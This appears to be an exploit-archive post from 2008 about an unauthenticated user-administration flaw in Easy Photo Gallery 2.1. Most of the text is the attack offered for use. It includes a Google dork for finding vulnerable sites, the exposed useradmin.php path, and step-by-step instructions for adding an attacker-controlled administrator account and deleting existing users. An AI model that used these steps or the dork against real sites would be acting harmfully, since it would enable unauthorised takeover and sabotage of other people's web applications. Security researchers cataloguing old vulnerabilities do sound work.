[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability
# Published : 2008-09-11
# Author : Stack
# Previous Title : IntegraMOD 1.4.x (Insecure Directory) Download Database Vulnerability
# Next Title : Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------
Exploit :
http://site.il/useradmin.php
how to use exploit
in Add user select
----------------------------------------
Simple example by Stack user :d :d
----------------------------------------
Add user
Name: Stack
Password: passstack
E-mail: Stack@hotmail.fr
Private: yes or no
Administrator: yes
now stack username is a administrator user
----------------------------------------
Remove user
User: chouse the user and click remove
----------------------------------------
# www.Syue.com [2008-09-11]